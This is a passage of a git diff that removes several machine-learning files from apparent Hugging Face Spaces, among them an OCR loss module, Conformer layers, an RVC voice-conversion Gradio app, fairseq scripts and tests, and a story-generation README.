- """ - data_info = {} - parsed_anno = self.parser(raw_anno_info) - img_path = osp.join(self.data_prefix['img_path'], - parsed_anno[self.parser.keys[0]]) - - data_info['img_path'] = img_path - data_info['instances'] = [dict(text=parsed_anno[self.parser.keys[1]])] - return data_info diff --git a/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/module_losses/seg_based_module_loss.py b/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/module_losses/seg_based_module_loss.py deleted file mode 100644 index 2f2166921a1a31e9cbe1bfb0be7b8a9d2252b3d4..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/module_losses/seg_based_module_loss.py +++ /dev/null @@ -1,100 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import sys -from typing import Optional, Sequence, Tuple, Union - -import cv2 -import numpy as np -import torch -from mmengine.logging import MMLogger -from shapely.geometry import Polygon - -from mmocr.utils.polygon_utils import offset_polygon -from .base import BaseTextDetModuleLoss - - -class SegBasedModuleLoss(BaseTextDetModuleLoss): - """Base class for the module loss of segmentation-based text detection - algorithms with some handy utilities.""" - - def _generate_kernels( - self, - img_size: Tuple[int, int], - text_polys: Sequence[np.ndarray], - shrink_ratio: float, - max_shrink_dist: Union[float, int] = sys.maxsize, - ignore_flags: Optional[torch.Tensor] = None - ) -> Tuple[np.ndarray, np.ndarray]: - """Generate text instance kernels according to a shrink ratio. - - Args: - img_size (tuple(int, int)): The image size of (height, width). - text_polys (Sequence[np.ndarray]): 2D array of text polygons. - shrink_ratio (float or int): The shrink ratio of kernel. - max_shrink_dist (float or int): The maximum shrinking distance. - ignore_flags (torch.BoolTensor, optional): Indicate whether the - corresponding text polygon is ignored. Defaults to None. 
- - Returns: - tuple(ndarray, ndarray): The text instance kernels of shape - (height, width) and updated ignorance flags. - """ - assert isinstance(img_size, tuple) - assert isinstance(shrink_ratio, (float, int)) - - logger: MMLogger = MMLogger.get_current_instance() - - h, w = img_size - text_kernel = np.zeros((h, w), dtype=np.float32) - - for text_ind, poly in enumerate(text_polys): - if ignore_flags is not None and ignore_flags[text_ind]: - continue - poly = poly.reshape(-1, 2).astype(np.int32) - poly_obj = Polygon(poly) - area = poly_obj.area - peri = poly_obj.length - distance = min( - int(area * (1 - shrink_ratio * shrink_ratio) / (peri + 0.001) + - 0.5), max_shrink_dist) - shrunk_poly = offset_polygon(poly, -distance) - - if len(shrunk_poly) == 0: - if ignore_flags is not None: - ignore_flags[text_ind] = True - continue - - try: - shrunk_poly = shrunk_poly.reshape(-1, 2) - except Exception as e: - logger.info(f'{shrunk_poly} with error {e}') - if ignore_flags is not None: - ignore_flags[text_ind] = True - continue - - cv2.fillPoly(text_kernel, [shrunk_poly.astype(np.int32)], - text_ind + 1) - - return text_kernel, ignore_flags - - def _generate_effective_mask(self, mask_size: Tuple[int, int], - ignored_polygons: Sequence[np.ndarray] - ) -> np.ndarray: - """Generate effective mask by setting the invalid regions to 0 and 1 - otherwise. - - Args: - mask_size (tuple(int, int)): The mask size. - ignored_polygons (Sequence[ndarray]): 2-d array, representing all - the ignored polygons of the text region. - - Returns: - mask (ndarray): The effective mask of shape (height, width). 
- """ - - mask = np.ones(mask_size, dtype=np.uint8) - - for poly in ignored_polygons: - instance = poly.astype(np.int32).reshape(1, -1, 2) - cv2.fillPoly(mask, instance, 0) - - return mask diff --git a/spaces/NATSpeech/PortaSpeech/modules/commons/conformer/conformer.py b/spaces/NATSpeech/PortaSpeech/modules/commons/conformer/conformer.py deleted file mode 100644 index 21e1ecdda7ec069864d3904abb4360ec5aee637e..0000000000000000000000000000000000000000 --- a/spaces/NATSpeech/PortaSpeech/modules/commons/conformer/conformer.py +++ /dev/null @@ -1,72 +0,0 @@ -from torch import nn -from .espnet_positional_embedding import RelPositionalEncoding -from .espnet_transformer_attn import RelPositionMultiHeadedAttention -from .layers import Swish, ConvolutionModule, EncoderLayer, MultiLayeredConv1d -from ..layers import Embedding - - -class ConformerLayers(nn.Module): - def __init__(self, hidden_size, num_layers, kernel_size=9, dropout=0.0, num_heads=4, - use_last_norm=True, save_hidden=False): - super().__init__() - self.use_last_norm = use_last_norm - self.layers = nn.ModuleList() - positionwise_layer = MultiLayeredConv1d - positionwise_layer_args = (hidden_size, hidden_size * 4, 1, dropout) - self.pos_embed = RelPositionalEncoding(hidden_size, dropout) - self.encoder_layers = nn.ModuleList([EncoderLayer( - hidden_size, - RelPositionMultiHeadedAttention(num_heads, hidden_size, 0.0), - positionwise_layer(*positionwise_layer_args), - positionwise_layer(*positionwise_layer_args), - ConvolutionModule(hidden_size, kernel_size, Swish()), - dropout, - ) for _ in range(num_layers)]) - if self.use_last_norm: - self.layer_norm = nn.LayerNorm(hidden_size) - else: - self.layer_norm = nn.Linear(hidden_size, hidden_size) - self.save_hidden = save_hidden - if save_hidden: - self.hiddens = [] - - def forward(self, x, padding_mask=None): - """ - - :param x: [B, T, H] - :param padding_mask: [B, T] - :return: [B, T, H] - """ - self.hiddens = [] - nonpadding_mask = x.abs().sum(-1) > 0 - x = 
self.pos_embed(x) - for l in self.encoder_layers: - x, mask = l(x, nonpadding_mask[:, None, :]) - if self.save_hidden: - self.hiddens.append(x[0]) - x = x[0] - x = self.layer_norm(x) * nonpadding_mask.float()[:, :, None] - return x - - -class ConformerEncoder(ConformerLayers): - def __init__(self, hidden_size, dict_size, num_layers=None): - conformer_enc_kernel_size = 9 - super().__init__(hidden_size, num_layers, conformer_enc_kernel_size) - self.embed = Embedding(dict_size, hidden_size, padding_idx=0) - - def forward(self, x): - """ - - :param src_tokens: [B, T] - :return: [B x T x C] - """ - x = self.embed(x) # [B, T, H] - x = super(ConformerEncoder, self).forward(x) - return x - - -class ConformerDecoder(ConformerLayers): - def __init__(self, hidden_size, num_layers): - conformer_dec_kernel_size = 9 - super().__init__(hidden_size, num_layers, conformer_dec_kernel_size) diff --git a/spaces/Naszirs397/rvc-models/app.py b/spaces/Naszirs397/rvc-models/app.py deleted file mode 100644 index 5ef3bed52089af1afd7b5edcf72721d92b2bbbe0..0000000000000000000000000000000000000000 --- a/spaces/Naszirs397/rvc-models/app.py +++ /dev/null @@ -1,188 +0,0 @@ -import os -import json -import argparse -import traceback -import logging -import gradio as gr -import numpy as np -import librosa -import torch -import asyncio -import edge_tts -from datetime import datetime -from fairseq import checkpoint_utils -from infer_pack.models import SynthesizerTrnMs256NSFsid, SynthesizerTrnMs256NSFsid_nono -from vc_infer_pipeline import VC -from config import ( - is_half, - device -) -logging.getLogger("numba").setLevel(logging.WARNING) -limitation = os.getenv("SYSTEM") == "spaces" # limit audio length in huggingface spaces - -def create_vc_fn(tgt_sr, net_g, vc, if_f0, file_index, file_big_npy): - def vc_fn( - input_audio, - f0_up_key, - f0_method, - index_rate, - tts_mode, - tts_text, - tts_voice - ): - try: - if tts_mode: - if len(tts_text) > 100 and limitation: - return "Text is too long", None - 
if tts_text is None or tts_voice is None: - return "You need to enter text and select a voice", None - asyncio.run(edge_tts.Communicate(tts_text, "-".join(tts_voice.split('-')[:-1])).save("tts.mp3")) - audio, sr = librosa.load("tts.mp3", sr=16000, mono=True) - else: - if args.files: - audio, sr = librosa.load(input_audio, sr=16000, mono=True) - else: - if input_audio is None: - return "You need to upload an audio", None - sampling_rate, audio = input_audio - duration = audio.shape[0] / sampling_rate - if duration > 20 and limitation: - return "Please upload an audio file that is less than 20 seconds. If you need to generate a longer audio file, please use Colab.", None - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - times = [0, 0, 0] - f0_up_key = int(f0_up_key) - audio_opt = vc.pipeline( - hubert_model, - net_g, - 0, - audio, - times, - f0_up_key, - f0_method, - file_index, - file_big_npy, - index_rate, - if_f0, - ) - print( - f"[{datetime.now().strftime('%Y-%m-%d %H:%M')}]: npy: {times[0]}, f0: {times[1]}s, infer: {times[2]}s" - ) - return "Success", (tgt_sr, audio_opt) - except: - info = traceback.format_exc() - print(info) - return info, (None, None) - return vc_fn - -def load_hubert(): - global hubert_model - models, _, _ = checkpoint_utils.load_model_ensemble_and_task( - ["hubert_base.pt"], - suffix="", - ) - hubert_model = models[0] - hubert_model = hubert_model.to(device) - if is_half: - hubert_model = hubert_model.half() - else: - hubert_model = hubert_model.float() - hubert_model.eval() - -def change_to_tts_mode(tts_mode): - if tts_mode: - return gr.Audio.update(visible=False), gr.Textbox.update(visible=True), gr.Dropdown.update(visible=True) - else: - return gr.Audio.update(visible=True), gr.Textbox.update(visible=False), gr.Dropdown.update(visible=False) - 
-if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--api', action="store_true", default=False) - parser.add_argument("--share", action="store_true", default=False, help="share gradio app") - parser.add_argument("--files", action="store_true", default=False, help="load audio from path") - args, unknown = parser.parse_known_args() - load_hubert() - models = [] - tts_voice_list = asyncio.get_event_loop().run_until_complete(edge_tts.list_voices()) - voices = [f"{v['ShortName']}-{v['Gender']}" for v in tts_voice_list] - with open("weights/model_info.json", "r", encoding="utf-8") as f: - models_info = json.load(f) - for name, info in models_info.items(): - if not info['enable']: - continue - title = info['title'] - author = info.get("author", None) - cover = f"weights/{name}/{info['cover']}" - index = f"weights/{name}/{info['feature_retrieval_library']}" - npy = f"weights/{name}/{info['feature_file']}" - cpt = torch.load(f"weights/{name}/{name}.pth", map_location="cpu") - tgt_sr = cpt["config"][-1] - cpt["config"][-3] = cpt["weight"]["emb_g.weight"].shape[0] # n_spk - if_f0 = cpt.get("f0", 1) - if if_f0 == 1: - net_g = SynthesizerTrnMs256NSFsid(*cpt["config"], is_half=is_half) - else: - net_g = SynthesizerTrnMs256NSFsid_nono(*cpt["config"]) - del net_g.enc_q - print(net_g.load_state_dict(cpt["weight"], strict=False)) # 不加这一行清不干净, 真奇葩 - net_g.eval().to(device) - if is_half: - net_g = net_g.half() - else: - net_g = net_g.float() - vc = VC(tgt_sr, device, is_half) - models.append((name, title, author, cover, create_vc_fn(tgt_sr, net_g, vc, if_f0, index, npy))) - with gr.Blocks() as app: - gr.Markdown( - "#
    RVC Models\n" - "##
    The input audio should be clean and pure voice without background music.\n" - "![visitor badge](https://visitor-badge.glitch.me/badge?page_id=zomehwh.Rvc-Models)\n\n" - "[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/16MXRcKEjGDqQzVanvi8xYOOOlhdNBopM?usp=share_link)\n\n" - "[![Duplicate this Space](https://huggingface.co/datasets/huggingface/badges/raw/main/duplicate-this-space-sm-dark.svg)](https://huggingface.co/spaces/zomehwh/rvc-models?duplicate=true)\n\n" - "[![Original Repo](https://badgen.net/badge/icon/github?icon=github&label=Original%20Repo)](https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI)" - - ) - with gr.Tabs(): - for (name, title, author, cover, vc_fn) in models: - with gr.TabItem(name): - with gr.Row(): - gr.Markdown( - '
    ' - f'
    {title}
    \n'+ - (f'
    Model author: {author}
    ' if author else "")+ - (f'' if cover else "")+ - '
    ' - ) - with gr.Row(): - with gr.Column(): - if args.files: - vc_input = gr.Textbox(label="Input audio path") - else: - vc_input = gr.Audio(label="Input audio"+' (less than 20 seconds)' if limitation else '') - vc_transpose = gr.Number(label="Transpose", value=0) - vc_f0method = gr.Radio( - label="Pitch extraction algorithm, PM is fast but Harvest is better for low frequencies", - choices=["pm", "harvest"], - value="pm", - interactive=True, - ) - vc_index_ratio = gr.Slider( - minimum=0, - maximum=1, - label="Retrieval feature ratio", - value=0.6, - interactive=True, - ) - tts_mode = gr.Checkbox(label="tts (use edge-tts as input)", value=False) - tts_text = gr.Textbox(visible=False,label="TTS text (100 words limitation)" if limitation else "TTS text") - tts_voice = gr.Dropdown(label="Edge-tts speaker", choices=voices, visible=False, allow_custom_value=False, value="en-US-AnaNeural-Female") - vc_submit = gr.Button("Generate", variant="primary") - with gr.Column(): - vc_output1 = gr.Textbox(label="Output Message") - vc_output2 = gr.Audio(label="Output Audio") - vc_submit.click(vc_fn, [vc_input, vc_transpose, vc_f0method, vc_index_ratio, tts_mode, tts_text, tts_voice], [vc_output1, vc_output2]) - tts_mode.change(change_to_tts_mode, [tts_mode], [vc_input, tts_text, tts_voice]) - app.queue(concurrency_count=1, max_size=20, api_open=args.api).launch(share=args.share) \ No newline at end of file diff --git a/spaces/NiuTaipu/moe-tts-test01/text/ngu_dialect.py b/spaces/NiuTaipu/moe-tts-test01/text/ngu_dialect.py deleted file mode 100644 index 69d0ce6fe5a989843ee059a71ccab793f20f9176..0000000000000000000000000000000000000000 --- a/spaces/NiuTaipu/moe-tts-test01/text/ngu_dialect.py +++ /dev/null @@ -1,30 +0,0 @@ -import re -import opencc - - -dialects = {'SZ': 'suzhou', 'WX': 'wuxi', 'CZ': 'changzhou', 'HZ': 'hangzhou', - 'SX': 'shaoxing', 'NB': 'ningbo', 'JJ': 'jingjiang', 'YX': 'yixing', - 'JD': 'jiading', 'ZR': 'zhenru', 'PH': 'pinghu', 'TX': 'tongxiang', - 'JS': 
'jiashan', 'HN': 'xiashi', 'LP': 'linping', 'XS': 'xiaoshan', - 'FY': 'fuyang', 'RA': 'ruao', 'CX': 'cixi', 'SM': 'sanmen', - 'TT': 'tiantai', 'WZ': 'wenzhou', 'SC': 'suichang', 'YB': 'youbu'} - -converters = {} - -for dialect in dialects.values(): - try: - converters[dialect] = opencc.OpenCC("chinese_dialect_lexicons/"+dialect) - except: - pass - - -def ngu_dialect_to_ipa(text, dialect): - dialect = dialects[dialect] - text = converters[dialect].convert(text).replace('-','').replace('$',' ') - text = re.sub(r'[、;:]', ',', text) - text = re.sub(r'\s*,\s*', ', ', text) - text = re.sub(r'\s*。\s*', '. ', text) - text = re.sub(r'\s*?\s*', '? ', text) - text = re.sub(r'\s*!\s*', '! ', text) - text = re.sub(r'\s*$', '', text) - return text diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/textless_nlp/gslm/ulm/sample.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/textless_nlp/gslm/ulm/sample.py deleted file mode 100644 index 77302a6894cacf07588cf34fb1e695dc519d7df5..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/textless_nlp/gslm/ulm/sample.py +++ /dev/null @@ -1,174 +0,0 @@ -#!/usr/bin/env python3 -u -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
-""" -Sample from a trained LM; hacked fairseq-interactive -""" -from collections import namedtuple -import os -import ast -import numpy as np - -from fairseq import checkpoint_utils, options, tasks, utils - -import tqdm - -Batch = namedtuple('Batch', 'ids src_tokens src_lengths') -Translation = namedtuple('Translation', 'src_str hypos pos_scores alignments') - - -def make_batches(lines, args, task, max_positions): - tokens = [ - task.source_dictionary.encode_line( - src_str, add_if_not_exist=False - ).long() - for src_str in lines - ] - lengths = [t.numel() for t in tokens] - itr = task.get_batch_iterator( - dataset=task.build_dataset_for_inference(tokens, lengths), - max_tokens=args.dataset.max_tokens, - max_sentences=args.dataset.batch_size, - max_positions=max_positions, - ignore_invalid_inputs=args.dataset.skip_invalid_size_inputs_valid_test - ).next_epoch_itr(shuffle=False) - for batch in itr: - yield Batch( - ids=batch['id'], - src_tokens=batch['net_input']['src_tokens'], src_lengths=batch['net_input']['src_lengths'], - ) - - -def main(args): - arg_prompts = args.prompts - arg_output = args.output - arg_debug = args.debug - arg_sample_size = args.samples_per_prompt - - try: - from fairseq.dataclass.utils import convert_namespace_to_omegaconf - args = convert_namespace_to_omegaconf(args) - except: - pass - - # if args.max_tokens is None and args.max_sentences is None: - if args.common.seed is not None: - np.random.seed(args.common.seed) - utils.set_torch_seed(args.common.seed) - - if args.generation.sampling: - args.generation.nbest = args.generation.beam = arg_sample_size - - task = tasks.setup_task(args.task) - - overrides = ast.literal_eval(args.common_eval.model_overrides) - - models, _model_args = checkpoint_utils.load_model_ensemble( - args.common_eval.path.split(os.pathsep), - arg_overrides=overrides, - task=task, - suffix=getattr(args, "checkpoint_suffix", ""), - ) - - # Set dictionaries - src_dict = task.source_dictionary - tgt_dict = 
task.target_dictionary - - # Optimize ensemble for generation - for model in models: - model.prepare_for_inference_(args) - model.cuda() - - # Load alignment dictionary for unknown word replacement - # (None if no unknown word replacement, empty if no path to align dictionary) - align_dict = utils.load_align_dict(args.generation.replace_unk) - - max_positions = utils.resolve_max_positions( - task.max_positions(), - *[model.max_positions() for model in models] - ) - - output_file = open(arg_output, 'w') - - with open(arg_prompts, 'r') as fin: - lines = fin.readlines() - - split = [x.split('|', 1) for x in lines] - seq_id = [x[0] for x in split] - prompts = [x[1] for x in split] - - if args.generation.prefix_size >= 0: - prompts = [' '.join(l.split()[:args.generation.prefix_size]) - for l in prompts] - - if arg_debug: - prompts = prompts[:10] - - generator = task.build_generator(models, args.generation) - - start_id = 0 - pbar = tqdm.tqdm(total=len(prompts)) - for batch in make_batches(prompts, args, task, max_positions): - src_tokens = batch.src_tokens - src_lengths = batch.src_lengths - src_tokens = src_tokens.cuda() - src_lengths = src_lengths.cuda() - - sample = { - 'net_input': { - 'src_tokens': src_tokens, - 'src_lengths': src_lengths, - }, - } - - results = [] - translations = task.inference_step(generator, models, sample) - for i, (id, hypos) in enumerate(zip(batch.ids.tolist(), translations)): - src_tokens_i = utils.strip_pad(src_tokens[i], tgt_dict.pad()) - results.append((i + start_id, src_tokens_i, hypos)) - - # sort output to match input order - for id, src_tokens, hypos in sorted(results, key=lambda x: x[0]): - if src_dict is not None: - src_str = src_dict.string( - src_tokens, args.common_eval.post_process) - - # Process top predictions - for hypo_id, hypo in enumerate(hypos): - _hypo_tokens, hypo_str, _alignment = utils.post_process_prediction( - hypo_tokens=hypo['tokens'].int().cpu(), - src_str=src_str, - alignment=hypo['alignment'], - 
align_dict=align_dict, - tgt_dict=tgt_dict, - remove_bpe=args.common_eval.post_process, - ) - - detok_hypo_str = hypo_str - utterance = detok_hypo_str - print(f'{seq_id[id]}__{hypo_id}|{utterance}', file=output_file) - pbar.update(1) - start_id += len(results) - - # output_file.close() - - -def cli_main(): - parser = options.get_interactive_generation_parser() - parser.add_argument('--prompts', type=str, default=None, required=True) - parser.add_argument('--output', type=str, default=None, required=True) - parser.add_argument('--debug', action='store_true') - parser.add_argument('--samples-per-prompt', type=int, default=1) - - args = options.parse_args_and_arch(parser) - - np.random.seed(args.seed) - utils.set_torch_seed(args.seed) - - main(args) - - -if __name__ == '__main__': - cli_main() diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/test_label_smoothing.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/test_label_smoothing.py deleted file mode 100644 index 04c0f974ac80f7606327f868e948712c3c18f1d0..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/test_label_smoothing.py +++ /dev/null @@ -1,123 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import argparse -import copy -import unittest - -import tests.utils as test_utils -import torch -from fairseq.criterions.cross_entropy import CrossEntropyCriterion -from fairseq.criterions.label_smoothed_cross_entropy import ( - LabelSmoothedCrossEntropyCriterion, -) - - -class TestLabelSmoothing(unittest.TestCase): - def setUp(self): - # build dictionary - self.d = test_utils.dummy_dictionary(3) - vocab = len(self.d) - self.assertEqual(vocab, 4 + 3) # 4 special + 3 tokens - self.assertEqual(self.d.pad(), 1) - self.assertEqual(self.d.eos(), 2) - self.assertEqual(self.d.unk(), 3) - pad, eos, unk, w1, w2, w3 = 1, 2, 3, 4, 5, 6 # noqa: F841 - - # build dataset - self.data = [ - # the first batch item has padding - { - "source": torch.LongTensor([w1, eos]), - "target": torch.LongTensor([w1, eos]), - }, - { - "source": torch.LongTensor([w1, eos]), - "target": torch.LongTensor([w1, w1, eos]), - }, - ] - self.sample = next(test_utils.dummy_dataloader(self.data)) - - # build model - self.args = argparse.Namespace() - self.args.sentence_avg = False - self.args.report_accuracy = False - self.args.probs = ( - torch.FloatTensor( - [ - # pad eos unk w1 w2 w3 - [0.05, 0.05, 0.1, 0.05, 0.3, 0.4, 0.05], - [0.05, 0.10, 0.2, 0.05, 0.2, 0.3, 0.10], - [0.05, 0.15, 0.3, 0.05, 0.1, 0.2, 0.15], - ] - ) - .unsqueeze(0) - .expand(2, 3, 7) - ) # add batch dimension - self.task = test_utils.TestTranslationTask.setup_task(self.args, self.d, self.d) - self.model = self.task.build_model(self.args) - - def test_nll_loss(self): - self.args.label_smoothing = 0.1 - nll_crit = CrossEntropyCriterion.build_criterion(self.args, self.task) - smooth_crit = LabelSmoothedCrossEntropyCriterion.build_criterion( - self.args, self.task - ) - nll_loss, nll_sample_size, nll_logging_output = nll_crit( - self.model, self.sample - ) - smooth_loss, smooth_sample_size, smooth_logging_output = smooth_crit( - self.model, self.sample - ) - self.assertLess(abs(nll_loss - nll_logging_output["loss"]), 1e-6) - 
self.assertLess(abs(nll_loss - smooth_logging_output["nll_loss"]), 1e-6) - - def test_padding(self): - self.args.label_smoothing = 0.1 - crit = LabelSmoothedCrossEntropyCriterion.build_criterion(self.args, self.task) - loss, _, logging_output = crit(self.model, self.sample) - - def get_one_no_padding(idx): - # create a new sample with just a single batch item so that there's - # no padding - sample1 = next(test_utils.dummy_dataloader([self.data[idx]])) - args1 = copy.copy(self.args) - args1.probs = args1.probs[idx, :, :].unsqueeze(0) - model1 = self.task.build_model(args1) - loss1, _, _ = crit(model1, sample1) - return loss1 - - loss1 = get_one_no_padding(0) - loss2 = get_one_no_padding(1) - self.assertAlmostEqual(loss, loss1 + loss2) - - def test_reduction(self): - self.args.label_smoothing = 0.1 - crit = LabelSmoothedCrossEntropyCriterion.build_criterion(self.args, self.task) - loss, _, logging_output = crit(self.model, self.sample, reduce=True) - unreduced_loss, _, _ = crit(self.model, self.sample, reduce=False) - self.assertAlmostEqual(loss, unreduced_loss.sum()) - - def test_zero_eps(self): - self.args.label_smoothing = 0.0 - nll_crit = CrossEntropyCriterion.build_criterion(self.args, self.task) - smooth_crit = LabelSmoothedCrossEntropyCriterion.build_criterion( - self.args, self.task - ) - nll_loss, nll_sample_size, nll_logging_output = nll_crit( - self.model, self.sample - ) - smooth_loss, smooth_sample_size, smooth_logging_output = smooth_crit( - self.model, self.sample - ) - self.assertAlmostEqual(nll_loss, smooth_loss) - - def assertAlmostEqual(self, t1, t2): - self.assertEqual(t1.size(), t2.size(), "size mismatch") - self.assertLess((t1 - t2).abs().max(), 1e-6) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/stories/README.md b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/stories/README.md deleted file mode 100644 index 
588941eddc5f0280f5254affd40ef49de874c885..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/stories/README.md +++ /dev/null @@ -1,66 +0,0 @@ -# Hierarchical Neural Story Generation (Fan et al., 2018) - -The following commands provide an example of pre-processing data, training a model, and generating text for story generation with the WritingPrompts dataset. - -## Pre-trained models - -Description | Dataset | Model | Test set(s) ----|---|---|--- -Stories with Convolutional Model
    ([Fan et al., 2018](https://arxiv.org/abs/1805.04833)) | [WritingPrompts](https://dl.fbaipublicfiles.com/fairseq/data/writingPrompts.tar.gz) | [download (.tar.bz2)](https://dl.fbaipublicfiles.com/fairseq/models/stories_checkpoint.tar.bz2) | [download (.tar.bz2)](https://dl.fbaipublicfiles.com/fairseq/data/stories_test.tar.bz2) - -We provide sample stories generated by the [convolutional seq2seq model](https://dl.fbaipublicfiles.com/fairseq/data/seq2seq_stories.txt) and [fusion model](https://dl.fbaipublicfiles.com/fairseq/data/fusion_stories.txt) from [Fan et al., 2018](https://arxiv.org/abs/1805.04833). The corresponding prompts for the fusion model can be found [here](https://dl.fbaipublicfiles.com/fairseq/data/fusion_prompts.txt). Note that there are unk in the file, as we modeled a small full vocabulary (no BPE or pre-training). We did not use these unk prompts for human evaluation. - -## Dataset - -The dataset can be downloaded like this: - -```bash -cd examples/stories -curl https://dl.fbaipublicfiles.com/fairseq/data/writingPrompts.tar.gz | tar xvzf - -``` - -and contains a train, test, and valid split. The dataset is described here: https://arxiv.org/abs/1805.04833. We model only the first 1000 words of each story, including one newLine token. - -## Example usage - -First we will preprocess the dataset. Note that the dataset release is the full data, but the paper models the first 1000 words of each story. 
Here is example code that trims the dataset to the first 1000 words of each story: -```python -data = ["train", "test", "valid"] -for name in data: - with open(name + ".wp_target") as f: - stories = f.readlines() - stories = [" ".join(i.split()[0:1000]) for i in stories] - with open(name + ".wp_target", "w") as o: - for line in stories: - o.write(line.strip() + "\n") -``` - -Once we've trimmed the data we can binarize it and train our model: -```bash -# Binarize the dataset: -export TEXT=examples/stories/writingPrompts -fairseq-preprocess --source-lang wp_source --target-lang wp_target \ - --trainpref $TEXT/train --validpref $TEXT/valid --testpref $TEXT/test \ - --destdir data-bin/writingPrompts --padding-factor 1 --thresholdtgt 10 --thresholdsrc 10 - -# Train the model: -fairseq-train data-bin/writingPrompts -a fconv_self_att_wp --lr 0.25 --optimizer nag --clip-norm 0.1 --max-tokens 1500 --lr-scheduler reduce_lr_on_plateau --decoder-attention True --encoder-attention False --criterion label_smoothed_cross_entropy --weight-decay .0000001 --label-smoothing 0 --source-lang wp_source --target-lang wp_target --gated-attention True --self-attention True --project-input True --pretrained False - -# Train a fusion model: -# add the arguments: --pretrained True --pretrained-checkpoint path/to/checkpoint - -# Generate: -# Note: to load the pretrained model at generation time, you need to pass in a model-override argument to communicate to the fusion model at generation time where you have placed the pretrained checkpoint. By default, it will load the exact path of the fusion model's pretrained model from training time. You should use model-override if you have moved the pretrained model (or are using our provided models). If you are generating from a non-fusion model, the model-override argument is not necessary. 
- -fairseq-generate data-bin/writingPrompts --path /path/to/trained/model/checkpoint_best.pt --batch-size 32 --beam 1 --sampling --sampling-topk 10 --temperature 0.8 --nbest 1 --model-overrides "{'pretrained_checkpoint':'/path/to/pretrained/model/checkpoint'}" -``` - -## Citation -```bibtex -@inproceedings{fan2018hierarchical, - title = {Hierarchical Neural Story Generation}, - author = {Fan, Angela and Lewis, Mike and Dauphin, Yann}, - booktitle = {Conference of the Association for Computational Linguistics (ACL)}, - year = 2018, -} -``` diff --git a/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/latent_depth/latent_depth_src/models/latent_multilingual_transformer.py b/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/latent_depth/latent_depth_src/models/latent_multilingual_transformer.py deleted file mode 100644 index 9e7b655feee0042d42ac2b13cec5f1d2a88e201e..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/latent_depth/latent_depth_src/models/latent_multilingual_transformer.py +++ /dev/null @@ -1,76 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from fairseq.models import register_model, register_model_architecture -from fairseq.models.multilingual_transformer import MultilingualTransformerModel -from fairseq.models.transformer import ( - TransformerDecoder, - TransformerEncoder, - base_architecture, -) -from fairseq.utils import safe_hasattr - -from .latent_transformer import LatentTransformerDecoder, LatentTransformerEncoder - - -@register_model("latent_multilingual_transformer") -class LatentMultilingualTransformerModel(MultilingualTransformerModel): - """A variant of the standard multilingual Transformer model whose encoders and/or - decoders support latent depth, as described in "Deep Transformer with Latent Depth" - (https://arxiv.org/abs/2009.13102). 
- """ - - @staticmethod - def add_args(parser): - """Add model-specific arguments to the parser.""" - MultilingualTransformerModel.add_args(parser) - parser.add_argument( - '--soft-select', - action='store_true', - help='use soft samples in training and inference', - ) - parser.add_argument( - '--sampling-tau', - type=float, - default=5., - help='sampling temperature', - ) - - @classmethod - def _get_module_class(cls, is_encoder, args, lang_dict, embed_tokens, langs): - if is_encoder: - if safe_hasattr(args, "encoder_latent_layer") and args.encoder_latent_layer: - return LatentTransformerEncoder( - args, lang_dict, embed_tokens, num_logits=len(langs) - ) - else: - return TransformerEncoder(args, lang_dict, embed_tokens) - else: - if safe_hasattr(args, "decoder_latent_layer") and args.decoder_latent_layer: - return LatentTransformerDecoder( - args, lang_dict, embed_tokens, num_logits=len(langs) - ) - else: - return TransformerDecoder(args, lang_dict, embed_tokens) - - -@register_model_architecture( - "latent_multilingual_transformer", "latent_multilingual_transformer" -) -def latent_multilingual_architecture(args): - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 512) - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 1024) - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 4) - args.encoder_layers = getattr(args, "encoder_layers", 12) - args.decoder_embed_dim = getattr(args, "decoder_embed_dim", 512) - args.decoder_ffn_embed_dim = getattr(args, "decoder_ffn_embed_dim", 1024) - args.decoder_attention_heads = getattr(args, "decoder_attention_heads", 4) - args.decoder_layers = getattr(args, "decoder_layers", 24) - args.share_encoders = getattr(args, "share_encoders", True) - args.share_decoders = getattr(args, "share_decoders", True) - args.share_encoder_embeddings = getattr(args, "share_encoder_embeddings", True) - args.share_decoder_embeddings = getattr(args, "share_decoder_embeddings", True) - - 
